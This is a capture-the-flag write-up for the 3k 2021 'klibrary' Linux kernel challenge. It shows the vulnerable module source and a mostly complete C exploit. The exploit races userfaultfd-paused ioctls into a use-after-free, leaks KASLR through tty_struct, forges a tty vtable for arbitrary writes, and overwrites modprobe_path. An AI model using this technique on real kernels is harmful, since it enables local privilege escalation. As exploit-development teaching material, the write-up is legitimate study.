Exploit linux kernel use after free with a race condition.
You can also read the writeup here: https://meowmeowxw.gitlab.io/ctf/3k-2021-klibrary/
Store your books safely inside the kernel!
nc klibrary.2021.3k.ctf.to 9994
This is a linux kernel pwn challenge. We have:
bzImage
-> This is the linux kernel imageinitramfs.cpio
-> This is the compressed file systemsrc/library.c
-> This is the source code of the custom kernel modulestart.sh
-> This is the qemu script to run the kernel image
To extract the filesystem use:
mkdir initramfs
cd initramfs
cpio -i < ../initramfs.cpio
Inside we can find the init
file and the custom kernel module library.ko
.
To compress the filesystem with cpio:
cd ./initramfs
find . | cpio -o -H newc > ../initramfs1.cpio
cd ../
To start the os as root you need to edit initramfs/init
:
setsid cttyhack setuidgid 0 sh
# setsid cttyhack setuidgid 1000 sh
I modified the start.sh
to compile my exploit, compress the filesystem, disable kaslr
and start qemu in debug mode:
#!/bin/sh
gcc -g -static ./exploit.c -o ./initramfs/exploit -lpthread -no-pie
cd ./initramfs
find . | cpio -o -H newc > ../initramfs1.cpio
cd ../
exec qemu-system-x86_64 \
-m 128M \
-nographic \
-kernel "./bzImage" \
-append "console=ttyS0 loglevel=3 oops=panic panic=-1 pti=on nokaslr" \
-no-reboot \
-cpu qemu64,+smep,+smap \
-monitor /dev/null \
-initrd "./initramfs1.cpio" \
-smp 2 \
-smp cores=2 \
-smp threads=1 \
-s
The active kernel protections are:
- KASLR
- SMEP -> You can't execute shellcode in user-space when the cpu is in kernel mode/ring 0
- SMAP -> You can't access page in user-space when the cpu is in kernel mode (it's harder to rop)
- KPTI -> Separate kernel-space from user-space page tables
You can extract the bzImage
with https://raw.githubusercontent.com/torvalds/linux/master/scripts/extract-vmlinux.
After that I use https://github.com/marin-m/vmlinux-to-elf to export the symbols
inside the kernel's elf image to use during debugging.
library.c
:
#include <linux/kernel.h>
#include <linux/fs.h>
#include <linux/mutex.h>
#include <linux/slab.h>
#include <linux/module.h>
#include <linux/uaccess.h>
#include <linux/device.h>
#define DEVICE_NAME "library"
#define CLASS_NAME "library"
#define BOOK_DESCRIPTION_SIZE 0x300
#define CMD_ADD 0x3000
#define CMD_REMOVE 0x3001
#define CMD_REMOVE_ALL 0x3002
#define CMD_ADD_DESC 0x3003
#define CMD_GET_DESC 0x3004
static DEFINE_MUTEX(ioctl_lock);
static DEFINE_MUTEX(remove_all_lock);
MODULE_AUTHOR("MaherAzzouzi");
MODULE_DESCRIPTION("A library implemented inside the kernel.");
MODULE_LICENSE("GPL");
static int major;
static long library_ioctl(struct file* file, unsigned int cmd, unsigned long arg);
static int library_open(struct inode* inode, struct file *filp);
static int library_release(struct inode* inode, struct file *filp);
static struct file_operations library_fops = {
.owner = THIS_MODULE,
.unlocked_ioctl = library_ioctl,
.open = library_open,
.release = library_release
};
static struct class* library_class = NULL;
static struct device* library_device = NULL;
struct Book {
char book_description[BOOK_DESCRIPTION_SIZE];
unsigned long index;
struct Book* next;
struct Book* prev;
} *root;
struct Request {
unsigned long index;
char __user * userland_pointer;
};
unsigned long counter = 1;
static int add_book(unsigned long index);
static int remove_book(unsigned long index);
static noinline int remove_all(void);
static int add_description_to_book(struct Request request);
static int get_book_description(struct Request request);
static int library_open(struct inode* inode, struct file *filp) {
printk(KERN_INFO "[library] : manage your books safely here!\n");
return 0;
}
static int library_release(struct inode* inode, struct file *filp) {
printk(KERN_INFO "[library] : vulnerable device closed! try harder.\n");
remove_all();
return 0;
}
static long library_ioctl(struct file* file, unsigned int cmd, unsigned long arg) {
struct Request request;
if(copy_from_user((void*)&request, (void*)arg, sizeof(struct Request))) {
return -1;
}
if(cmd == CMD_REMOVE_ALL) {
mutex_lock(&remove_all_lock);
remove_all();
mutex_unlock(&remove_all_lock);
} else {
mutex_lock(&ioctl_lock);
switch(cmd) {
case CMD_ADD:
add_book(request.index);
break;
case CMD_REMOVE:
remove_book(request.index);
break;
case CMD_ADD_DESC:
add_description_to_book(request);
break;
case CMD_GET_DESC:
get_book_description(request);
break;
}
mutex_unlock(&ioctl_lock);
}
return 0;
}
static int add_book(unsigned long index) {
if(counter >= 10) {
printk(KERN_INFO "[library] can only hold 10 books here\n");
return -1;
}
struct Book *b, *p;
b = (struct Book*)kzalloc(sizeof(struct Book), GFP_KERNEL);
if(b == NULL) {
printk(KERN_INFO "[library] : allocation failed! \n");
return -1;
}
b->index = index;
if(root == NULL) {
root = b;
root->prev = NULL;
root->next = NULL;
} else {
p = root;
while(p->next != NULL)
p = p->next;
p->next = b;
b->prev = p;
b->next = NULL;
}
counter++;
return 0;
}
static int remove_book(unsigned long index) {
struct Book *p, *prev, *next;
if(root == NULL) {
printk(KERN_INFO "[library] : no books in the library yet.");
return -1;
}
else if (root->index == index) {
p = root;
root = root->next;
kfree(p);
}
else {
p = root;
while(p != NULL && p->index != index)
p = p->next;
if(p == NULL) {
printk(KERN_INFO "[library] : can't remove %ld reason : not found\n", index);
}
prev = p->prev;
next = p->next;
prev->next = next;
next->prev = prev;
kfree(p);
}
counter--;
return 0;
}
static noinline int remove_all(void) {
struct Book *b, *p;
b = root;
while(b != NULL) {
p = b->next;
kfree(b);
b = p;
}
root = NULL;
counter = 1;
return 0;
}
static int add_description_to_book(struct Request request) {
struct Book* book = root;
if(book == NULL){
printk(KERN_INFO "[library] : no books in the library yet.\n");
return -1;
}
for(; book != NULL && book->index != request.index; book = book->next);
if(book == NULL) {
printk(KERN_INFO "[library] : the given index wasn't found\n");
return -1;
}
if(copy_from_user((void*)book->book_description,
(void*)(request.userland_pointer),
BOOK_DESCRIPTION_SIZE)) {
printk(KERN_INFO "[library] : copy_from_user failed for some reason.\n");
return -1;
}
}
static int get_book_description(struct Request request) {
struct Book* book;
book = root;
if(book == NULL) {
printk("[library] : no books yet, can not read the description.\n");
return -1;
}
while(book != NULL && book->index != request.index)
book = book->next;
if(book == NULL) {
printk(KERN_INFO "[library] : no book with the index you provided\n");
return -1;
}
if(copy_to_user((void*)request.userland_pointer,
(void*)book->book_description,
BOOK_DESCRIPTION_SIZE)) {
printk("[library] : copy_to_user failed!\n");
return -1;
}
}
static int __init init_library(void) {
major = register_chrdev(0, DEVICE_NAME, &library_fops);
if(major < 0) {
return -1;
}
library_class = class_create(THIS_MODULE, CLASS_NAME);
if(IS_ERR(library_class)) {
unregister_chrdev(major, DEVICE_NAME);
return -1;
}
library_device = device_create(library_class,
0,
MKDEV(major, 0),
0,
DEVICE_NAME);
if(IS_ERR(library_device)) {
class_destroy(library_class);
unregister_chrdev(major, DEVICE_NAME);
return -1;
}
root = NULL;
mutex_init(&ioctl_lock);
mutex_init(&remove_all_lock);
printk(KERN_INFO "[library] : started!\n");
return 0;
}
static void __exit exit_library(void) {
device_destroy(library_class, MKDEV(major, 0));
class_unregister(library_class);
class_destroy(library_class);
unregister_chrdev(major, DEVICE_NAME);
mutex_destroy(&ioctl_lock);
mutex_destroy(&remove_all_lock);
printk(KERN_INFO "[library] : finished!\n");
}
module_init(init_library);
module_exit(exit_library);
To communicate with the kernel module we need to use ioctl. The module has a double linked list called root:
struct Book {
char book_description[BOOK_DESCRIPTION_SIZE];
unsigned long index;
struct Book* next;
struct Book* prev;
} *root;
We can interact with the module with 5 commands:
- CMD_ADD(index) -> add book to the list and set the specified index
- CMD_REMOVE(index) -> remove book from the list
- CMD_ADD_DESC(index, buffer) -> copy userspace buffer inside
book_description
- CMD_GET_DESC(index, buffer) -> copy to userspace buffer the content of
book_description
- CMD_REMOVE_ALL() -> kfree all the book
We can have 10 books inside the list.
if(cmd == CMD_REMOVE_ALL) {
mutex_lock(&remove_all_lock);
remove_all();
mutex_unlock(&remove_all_lock);
} else {
mutex_lock(&ioctl_lock);
switch(cmd) {
case CMD_ADD:
add_book(request.index);
break;
case CMD_REMOVE:
remove_book(request.index);
break;
case CMD_ADD_DESC:
add_description_to_book(request);
break;
case CMD_GET_DESC:
get_book_description(request);
break;
}
mutex_unlock(&ioctl_lock);
}
The vulnerability is easy to spot if you're familiar with this kind of challenge.
The module uses two separate mutex_lock
to handle commands, so we can trigger a race condition:
- one thread add the description and another does the kfree of the list -> Use-After-Free (write)
- one thread get the description and another does the kfree of the list -> Use-After-Free (read)
SLUB is the default allocator of the linux kernel, of course it's not easy to understand the inner workings but there are some nice introductions on the internet:
- https://github.com/PaoloMonti42/salt/blob/master/docs/0x00_SLUB_refresher.md
- https://ruffell.nz/programming/writeups/2019/02/15/looking-at-kmalloc-and-the-slub-memory-allocator.html
- https://hammertux.github.io/slab-allocator
- Read the source code π
To make things simple there are different freelist of free objects of different sizes
and there are specific list to contain only specifc objects (ex. task_struct of every process).
You can find the freelist with: cat /proc/slabinfo
The freelist are simple linked-list with the next pointer that points to next free object.
On the implementation of SLUB there are two protections that luckily for us weren't
enabled on this challenge(in reality only one would have been a bit tedious):
- CONFIG_SLAB_FREELIST_HARDENED -> encrypt the next pointer with: xor of a random value xor address of the pointer bswapped (swap endianess, in a way similar to glibc 2.32 ptr protection)
- CONFIG_SLAB_FREELIST_RANDOM -> randomize the order of the freelist, by default the freed objects available are "ordered" from the lowest to highest address
Since our book struct occupies 0x318=792 bytes the kernel will get a freed object from a kmalloc-1024 list.
Spawning two threads that tries to trigger the race condition it's not optimal, we have low probability of success. Luckily for us exists userfaultfd that can be used to register the routine to handle a page fault in userspace:
https://blog.lizzie.io/using-userfaultfd.html
With this technique we can arbitrarily stop kernel code execution when the kernel tries to execute
copy_from_user(dest, uf_page, ...)
or copy_to_user(uf_page, src, ...)
where uf_page
is a mmaped
address in user space registered with userfaultfd by us.
So we can effectively stop during add_description_to_book
and get_book_description
to
execute remove_all
and trigger the UAF.
The first thing we have to do is to leak addresses to defeat KASLR. In linux kernel heap exploitation there are various techniques, the most used is to use some syscall to tell the kernel to allocate indirectly some structs, if we have a UAF we can then read/write to this struct to get an arb read/write or rip control.
- I free a book in address 0xaa00
- syscall(something) -> trigger kmalloc -> return 0xaa00
For a list of useful structs:
- https://ptr-yudai.hatenablog.com/entry/2020/03/16/165628
- www.personal.psu.edu/yxc431/publications/SLAKE.pdf
For kmalloc-1024 the most used structure is tty_struct
that we can use to achieve arbitrary read/write and RIP control. To allocate the
structure we just need to execute ptmx = open("/dev/ptmx", O_RDWR | O_NOCTTY);
The strategy is to:
Thread 1 | Thread 2 |
---|---|
allocate a book 0 | idle |
register ufd to address XYZ | idle |
get_book_description(dest=XYZ) --> STOP execution here | page fault |
idle | remove_all |
idle | open("/dev/ptmx") |
idle | return |
finish copy_to_user with leaked tty_struct | ended |
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <inttypes.h>
#include <sys/ioctl.h>
#include <sys/msg.h>
#include <sys/shm.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <sys/resource.h>
#include <pthread.h>
#include <sys/mman.h>
#include <poll.h>
#include <time.h>
#include <unistd.h>
#define DEVICE_NAME "/dev/library"
#define BOOK_DESCRIPTION_SIZE 0x300
#define CMD_ADD 0x3000
#define CMD_REMOVE 0x3001
#define CMD_REMOVE_ALL 0x3002
#define CMD_ADD_DESC 0x3003
#define CMD_GET_DESC 0x3004
#define PAGESIZE 0x1000
int ioctl_add(uint64_t id);
int ioctl_remove(uint64_t id);
int ioctl_add_desc(uint64_t id, uint8_t *buffer);
int ioctl_get_desc(uint64_t id, uint8_t *buffer);
int _ioctl_get_desc(uint64_t id, uint8_t *buffer);
int ioctl_remove_all();
void leak_heap();
void write_next_ptr();
void *race_userfault(void (*func)());
int userfaultfd(int flags);
int register_ufd(uint64_t page);
void print_leak(uint64_t *ptr, int size);
void get_rax();
typedef struct {
uint64_t index;
uint8_t *ptr;
} request_t;
typedef struct {
uint64_t index;
void *next;
void *prev;
} book_details;
uint64_t kbase = 0x0L,
heap_ptr = 0x0L;
int fd, ufd, ret, ptmx;
uint64_t uf_page, rax = 0, leak[BOOK_DESCRIPTION_SIZE];
const char cat[] = {0xf0, 0x9f, 0x90, 0x88, '\0'};
const char shark[] = {0xF0, 0x9F, 0xA6, 0x88, '\0'};
const char dice[] = {0xF0, 0x9F, 0x8E, 0xB2, '\0'};
const char alien[] = {0xF0, 0x9F, 0x91, 0xBE, '\0'};
const char ghost[] = {0xF0, 0x9F, 0x91, 0xBB, '\0'};
int main(int argc, char **argv) {
uint8_t *buf = calloc(BOOK_DESCRIPTION_SIZE, 1);
pthread_t th;
fd = open(DEVICE_NAME, O_RDONLY);
printf("[%s] fd: %d\n", alien, fd);
ioctl_add(0);
// 1st stage: LEAK KBASE AND KHEAP
ufd = register_ufd(0xaaa000);
printf("[%s] registered ufd: %d\t @ 0x%lx\n", shark, ufd, uf_page);
pthread_create(&th, NULL, (void *)race_userfault, leak_heap);
_ioctl_get_desc(0, (uint8_t *)0xaaa000);
kbase = leak[66] - 0x14fc00;
heap_ptr = leak[8] - 0x38;
printf("\n");
printf("[%s] kbase: 0x%016lx\n", ghost, kbase);
close(ptmx);
return 0;
}
int ioctl_add(uint64_t id) {
request_t arg = {
.index = id,
.ptr = NULL
};
printf("[*] ioctl_add[%ld]\n", id);
ret = ioctl(fd, CMD_ADD, &arg);
if (ret != 0) {
printf("[!] ioctl_add ret: %d\t id: %ld\n", ret, id);
}
return 0;
}
int ioctl_remove(uint64_t id) {
request_t arg = {
.index = id,
.ptr = NULL
};
printf("[*] ioctl_remove[%ld]\n", id);
ret = ioctl(fd, CMD_REMOVE, &id);
if (ret != 0) {
printf("[!] ioctl_remove ret: %d\t id: %ld\n", ret, id);
}
return 0;
}
int ioctl_add_desc(uint64_t id, uint8_t *buffer) {
request_t arg = {
.index = id,
.ptr = buffer
};
printf("[*] ioctl_add_desc[%ld]\n", id);
ret = ioctl(fd, CMD_ADD_DESC, &arg);
if (ret != 0) {
printf("[!] ioctl_add_desc ret: %d\t id: %ld\n", ret, id);
}
return 0;
}
int ioctl_get_desc(uint64_t id, uint8_t *buffer) {
memset(buffer, 0, BOOK_DESCRIPTION_SIZE);
return _ioctl_get_desc(id, buffer);
}
int _ioctl_get_desc(uint64_t id, uint8_t *buffer) {
request_t arg = {
.index = id,
.ptr = buffer
};
printf("[*] ioctl_get_desc[%ld]\n", id);
ret = ioctl(fd, CMD_GET_DESC, &arg);
if (ret != 0) {
printf("[!] ioctl_get_desc ret: %d\t id: %ld\n", ret, id);
}
memcpy(leak, buffer, BOOK_DESCRIPTION_SIZE);
print_leak((uint64_t *)buffer, BOOK_DESCRIPTION_SIZE);
return 0;
}
int ioctl_remove_all() {
request_t arg = {
.index = 0xffffff,
.ptr = NULL
};
printf("[*] ioctl_remove_all\n");
ret = ioctl(fd, CMD_REMOVE_ALL, &arg);
if (ret != 0) {
printf("[!] ioctl_remove_all ret: %d\n", ret);
}
return 0;
}
void print_leak(uint64_t *ptr, int size) {
for (int i = 0; i < size / 8; i++) {
printf("0x%016lx\t", ptr[i]);
if (!((i + 1) % 4)) {
printf("\n");
}
}
printf("\n");
}
int register_ufd(uint64_t page) {
int fd = 0;
int memsize = 0x1000;
uf_page = page;
struct uffdio_api api = { .api = UFFD_API };
uf_page = (uint64_t)mmap((void *)uf_page, 0x2000, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
if ((void *)uf_page == MAP_FAILED) {
perror("mmap uf_page");
exit(2);
}
if ((fd = userfaultfd(O_NONBLOCK)) == -1) {
fprintf(stderr, "++ userfaultfd failed: %m\n");
exit(-1);
}
if (ioctl(fd, UFFDIO_API, &api)) {
fprintf(stderr, "++ ioctl(fd, UFFDIO_API, ...) failed: %m\n");
exit(-1);
}
if (api.api != UFFD_API) {
fprintf(stderr, "++ unexepcted UFFD api version.\n");
exit(-1);
}
/* mmap some pages, set them up with the userfaultfd. */
struct uffdio_register reg = {
.mode = UFFDIO_REGISTER_MODE_MISSING,
.range = {
.start = uf_page,
.len = memsize
}
};
if (ioctl(fd, UFFDIO_REGISTER, ®) == -1) {
fprintf(stderr, "++ ioctl(fd, UFFDIO_REGISTER, ...) failed: %m\n");
exit(-1);
}
return fd;
}
void *race_userfault(void (*func)()) {
char uf_buffer[0x1000];
struct pollfd evt = { .fd = ufd, .events = POLLIN };
while (poll(&evt, 1, -1) > 0) {
/* unexpected poll events */
if (evt.revents & POLLERR) {
perror("poll");
exit(-1);
} else if (evt.revents & POLLHUP) {
perror("pollhup");
exit(-1);
}
struct uffd_msg fault_msg = {0};
if (read(ufd, &fault_msg, sizeof(fault_msg)) != sizeof(fault_msg)) {
perror("read");
exit(-1);
}
char *place = (char *)fault_msg.arg.pagefault.address;
if (fault_msg.event != UFFD_EVENT_PAGEFAULT
|| (place != (void *)uf_page && place != (void *)uf_page + PAGESIZE)) {
fprintf(stderr, "unexpected pagefault?.\n");
exit(-1);
}
if (place == (void *)uf_page) {
printf("[%s] got page fault at address %p, nice!\n", cat, place);
printf("[%s] call whatever I want\n", cat);
func();
printf("[%s] done! now releasing ufd to finish exit\n", cat);
/* release by copying some data to faulting address */
struct uffdio_copy copy = {
.dst = (long) place,
.src = (long) uf_buffer,
.len = PAGESIZE
};
if (ioctl(ufd, UFFDIO_COPY, ©) < 0) {
perror("ioctl(UFFDIO_COPY)");
exit(-1);
}
break;
}
}
close(ufd);
return NULL;
}
int userfaultfd(int flags) {
return syscall(SYS_userfaultfd, flags);
}
void leak_heap() {
ioctl_remove_all();
ptmx = open("/dev/ptmx", O_RDWR | O_NOCTTY);
}
Output:
[πΎ] fd: 3
[*] ioctl_add[0]
[π¦] registered ufd: 4 @ 0xaaa000
[*] ioctl_get_desc[0]
[π] got page fault at address 0xaaa000, nice!
[π] call whatever I want
[*] ioctl_remove_all
[π] done! now releasing ufd to finish exit
0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000000000000 0xffff8880070d2038
0xffff8880070d2038 0xffff8880070d2048
0xffff8880070d2048 0xffff88800004e260
0x0000000000000000 0xffff8880070d2068
0xffff8880070d2068 0x0000000000000000
0xffff8880070d2080 0xffff8880070d2080
0x0000000000000000 0xffff8880070d2098
0xffff8880070d2098 0x0000000000000000
0x0000000000000000 0xffff8880070d20b8
0xffff8880070d20b8 0x0000000000000000
0xffff8880070d20d0 0xffff8880070d20d0
0x0000000000000000 0x00000000000000bf
0x010004157f1c0300 0x170f12001a131100
0x0000960000000016 0x0000000000009600
0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x00000000306d7470 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000000010801 0x0000000000000001
0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000000000000 0xffff8880070d2400
0x0000000000000000 0xffff8880070d21d8
0xffff8880070d21d8 0xffff8880070d21e8
0xffff8880070d21e8 0x0000000fffffffe0
0xffff8880070d2200 0xffff8880070d2200
0xffffffff8114fc00 0xffffc90000091000
0xffff8880001658c0 0xffff88800003eb30
0xffff88800003eb30 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000fffffffe0 0xffff8880070d2258
0xffff8880070d2258 0xffffffff8114ec30
0xffff88800709c600 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
[π»] kbase: 0xffffffff81000000
[πΎ] heap_ptr: 0xffff8880070d2000
For some reasons I don't get the firsts 0x30 bytes of the tty_struct
. For example
at +0x18
there is the pointer to the virtual table used by the tty. To get the various
offset of a struct I use pahole
(sometimes however the offset depend on the
compilations flag etc). Example:
$ pahole -E tty_struct
struct tty_struct {
int magic; /* 0 4 */
struct kref {
/* typedef refcount_t */ struct refcount_struct {
/* typedef atomic_t */ struct {
int counter; /* 4 4 */
} refs; /* 4 4 */
} refcount; /* 4 4 */
} kref; /* 4 4 */
struct device * dev; /* 8 8 */
struct tty_driver * driver; /* 16 8 */
const struct tty_operations * ops; /* 24 8 */
int index; /* 32 4 */
/* XXX 4 bytes hole, try to pack */
struct ld_semaphore {
/* typedef atomic_long_t -> atomic64_t */ struct {
/* typedef s64 -> __s64 */ long long int counter; /* 40 8 */
...
struct list_head {
struct list_head * next; /* 56 8 */
/* --- cacheline 1 boundary (64 bytes) --- */
struct list_head * prev; /* 64 8 */
} read_wait; /* 56 16 */
struct list_head {
struct list_head * next; /* 72 8 */
struct list_head * prev; /* 80 8 */
...
Anyway, at offset 56/64 there is the prev and next that points to the address of
the next tty, but since they're not allocated we have the address of the pointer itself.
If we substract 0x38 we get the address of the tty.
At offset 66*8 we have instead a kernel leak, we just need to substract a fixed offset
to get the kernel base (verify with grep startup_64 /proc/kallsyms
).
I want to know what is the next available objects, so I redo the UAF in read, but
I don't open("/dev/ptmx")
// 2nd stage: LEAK NEXT PTR
ioctl_add(0);
ufd = register_ufd(0xbbb000);
printf("registered ufd: %d\t 0x%lx\n", ufd, uf_page);
pthread_create(&th, NULL, (void *)race_userfault, ioctl_remove_all);
_ioctl_get_desc(0, (uint8_t *)0xbbb000);
next_ptr = leak[512 / 8];
Usually you find the next_ptr in the first 8 bytes of an address, but this time they're in the middle of the chunk (1024/2).
I always get as next_ptr = heap_ptr + 1024
. So this step is skippable but maybe
in irl (non-qemu) it makes sense.
The best scenario is to be able to read/write inside the tty_struct, so we need to have a stable UAF (not one that can only be used during race condition). To do that I used this approach:
Basically I wanted that book1
was at address &book0 + 32
Why ?
Because in this way after a remove(1); open("/dev/ptmx")
with:
get_book_description(0)
I can read the tty_structadd_description_to_book(0)
I can overwrite the tty_struct
The +32 is needed to not overwrite the index, next, prev
of book0
, otherwise
we couldn't access book0
if we overwrite book0
with book1
.
We also need luck and hope that tty_struct doesn't overwrite the index of book0
or
we can't access book0
anymore (spoiler: we have luck)
// 3rd stage overwrite next ptr
ioctl_add(0);
ufd = register_ufd(0xccc000);
printf("registered ufd: %d\t 0x%lx\n", ufd, uf_page);
pthread_create(&th, NULL, (void *)race_userfault, ioctl_remove_all);
((uint64_t *)(uf_page + 0xf00))[512/8] = heap_ptr + 32;
ioctl_add_desc(0, (uint8_t *)0xcccf00);
ioctl_add(0);
memset(buf, 0, BOOK_DESCRIPTION_SIZE);
((uint64_t *)(buf + 32))[512/8] = next_ptr;
ioctl_add_desc(0, buf);
An additional step that I do after overwrite the first next_ptr is that I also
fix the next_ptr after that to point to the original next_ptr (that will become book2
).
A bug that it took me some time to fix was that I was trying to write inside uf_page
the
heap_ptr + 32
, however it triggered the pagefault in user-space. To bypass that
I mmaped uf_page
with size 0x2000 bytes and registered the pagefault in the first 0x1000
bytes. In this way I can write inside uf_page + 0xf00 + 0x200
the heap_ptr + 32
(without problems),
and pass as ptr to add_desc
0xcccf00 that triggers the right pagefault in the kernel.
tty_operations
is the virtual table used by the tty, since SMAP is active
we can't craft a fake vtable in user-space. However we can forge a fake vtable
inside book2
since we have its address.
struct tty_operations {
struct tty_struct * (*lookup)(struct tty_driver *, struct file *, int); /* 0 8 */
int (*install)(struct tty_driver *, struct tty_struct *); /* 8 8 */
void (*remove)(struct tty_driver *, struct tty_struct *); /* 16 8 */
int (*open)(struct tty_struct *, struct file *); /* 24 8 */
void (*close)(struct tty_struct *, struct file *); /* 32 8 */
void (*shutdown)(struct tty_struct *); /* 40 8 */
void (*cleanup)(struct tty_struct *); /* 48 8 */
int (*write)(struct tty_struct *, const unsigned char *, int); /* 56 8 */
/* --- cacheline 1 boundary (64 bytes) --- */
int (*put_char)(struct tty_struct *, unsigned char); /* 64 8 */
void (*flush_chars)(struct tty_struct *); /* 72 8 */
int (*write_room)(struct tty_struct *); /* 80 8 */
int (*chars_in_buffer)(struct tty_struct *); /* 88 8 */
int (*ioctl)(struct tty_struct *, unsigned int, long unsigned int); /* 96 8 */
long int (*compat_ioctl)(struct tty_struct *, unsigned int, long unsigned int); /* 104 8 */
void (*set_termios)(struct tty_struct *, struct ktermios *); /* 112 8 */
void (*throttle)(struct tty_struct *); /* 120 8 */
/* --- cacheline 2 boundary (128 bytes) --- */
void (*unthrottle)(struct tty_struct *); /* 128 8 */
void (*stop)(struct tty_struct *); /* 136 8 */
void (*start)(struct tty_struct *); /* 144 8 */
void (*hangup)(struct tty_struct *); /* 152 8 */
int (*break_ctl)(struct tty_struct *, int); /* 160 8 */
void (*flush_buffer)(struct tty_struct *); /* 168 8 */
void (*set_ldisc)(struct tty_struct *); /* 176 8 */
void (*wait_until_sent)(struct tty_struct *, int); /* 184 8 */
/* --- cacheline 3 boundary (192 bytes) --- */
void (*send_xchar)(struct tty_struct *, char); /* 192 8 */
int (*tiocmget)(struct tty_struct *); /* 200 8 */
int (*tiocmset)(struct tty_struct *, unsigned int, unsigned int); /* 208 8 */
int (*resize)(struct tty_struct *, struct winsize *); /* 216 8 */
int (*get_icount)(struct tty_struct *, struct serial_icounter_struct *); /* 224 8 */
int (*get_serial)(struct tty_struct *, struct serial_struct *); /* 232 8 */
int (*set_serial)(struct tty_struct *, struct serial_struct *); /* 240 8 */
void (*show_fdinfo)(struct tty_struct *, struct seq_file *); /* 248 8 */
/* --- cacheline 4 boundary (256 bytes) --- */
int (*proc_show)(struct seq_file *, void *); /* 256 8 */
/* size: 264, cachelines: 5, members: 33 */
/* last cacheline: 8 bytes */
};
There are some functions where we can control the parameters from user-space,
for example with ioctl
we control esi and rdx.
Basically our syscall ioctl(ptmx, esi, rdx)
will become ioctl(&tty_struct, esi, rdx)
.
I tried with write
but it doesn't seems controllable with parameters passed
from the write
in user-space (Maybe I was doing something wrong).
We can overwrite the address of tty_driver
inside the struct and try to call
remove, install, lookup to control rdi
but I didn't try.
I found https://pr0cf5.github.io/ctf/2020/03/09/the-plight-of-tty-in-the-linux-kernel.html that gives some tips on what gadgets are useful.
I found with ROPgadget
:
103448:0xffffffff8113e9b1 : mov dword ptr [rdx], esi ; ret // WRITE
122013:0xffffffff81034e74 : mov rax, qword ptr [rsi] ; ret // READ
I opted to overwrite modprobe_path
to read the flag. Another strategy was to use
read the list of task_struct
until I found my process and then with the write primitive
overwrite the uid=0
. However I needed to get the right offset (it depends on
kernel version and compilation flags) and modprobe_path
was easier.
So my plan was the following (in red the tty_struct):
// 4th stage write on modprobe_path
ioctl_add(1);
ioctl_add(2);
((uint64_t *)buf)[32 / 8] = dummy_ret; // cleanup functions
((uint64_t *)buf)[40 / 8] = dummy_ret;
((uint64_t *)buf)[48 / 8] = dummy_ret;
((uint64_t *)buf)[96 / 8] = mov_addr_rdx_esi; // ioctl function -> arbitrary write
ioctl_add_desc(2, buf);
ioctl_get_desc(2, buf);
// This part is not needed
book_details b = {
.index = 0,
.next = (void *)(heap_ptr + 32),
.prev = NULL,
};
memcpy(buf + BOOK_DESCRIPTION_SIZE - 0x20, &b, 0x18);
print_leak((uint64_t *)buf, BOOK_DESCRIPTION_SIZE);
ioctl_add_desc(1, buf);
Then:
ioctl_remove(1);
ptmx = open("/dev/ptmx", O_RDWR | O_NOCTTY);
ioctl_get_desc(0, buf);
memset(buf, 0, BOOK_DESCRIPTION_SIZE);
memcpy(buf, leak, BOOK_DESCRIPTION_SIZE);
((uint64_t *)buf)[7] = next_ptr; // overwrite pointer to vtable
ioctl_add_desc(0, buf);
ioctl(ptmx, *(int *)new_modprobe_path, modprobe_path); // trigger ioctl call inside vtable
ioctl(ptmx, *(int *)(new_modprobe_path + 4), modprobe_path + 4);
ioctl(ptmx, *(int *)(new_modprobe_path + 8), modprobe_path + 8);
system("echo -ne '\\xff\\xff\\xff\\xff' > /home/ctf/bho");
system("chmod +x /home/ctf/bho");
system("echo -ne '#!/bin/sh\nchmod 777 /flag.txt' > /home/ctf/a\n");
system("chmod +x /home/ctf/a");
system("/home/ctf/bho");
To upload the exploit on the server I recommend to compile with musl-gcc:
musl-gcc exploit.c -o /tmp/exploit -static -lpthread
For arch linux download:
yay -S musl kernel-headers-musl
3k{SM4P_4LWAYS_MAKES_1T_D1FFICULT_BUT_N0T_IMP0SSIBLE}
Everything works but I wanted to control RIP with a rop chain. To do that I tried
to find a stack pivot gadget to make rsp = address of book2
, and write inside
book2 a rop chain that called commit_cred(prepare_kernel_creds(0))
.
I wasn't able to find such gadget π.
There is this gadget 0xffffffff816467dd : push rdi ; pop rsp ; imul esp, dword ptr [rdx + 0x72], 0x616cef89 ; retf
that maybe could be used to stack pivot. To call correctly this gadget I tried
to call the remove
operations with close(ptmx)
.
I set as tty_driver ptr inside tty_struct = &book2 + 256
, +256 because in the first
256 bytes there is the tty_operations fake vtable.
Then I copied a a fake tty_driver struct inside and changed the ops
to point
to next_ptr = &book2
. This is needed because the remove
operation is called
from the tty_driver
, not the tty_struct
(https://elixir.bootlin.com/linux/v5.10.38/source/drivers/tty/tty_io.c#L1324).
However I get a pagefault after the push rdi
, I don't know why π.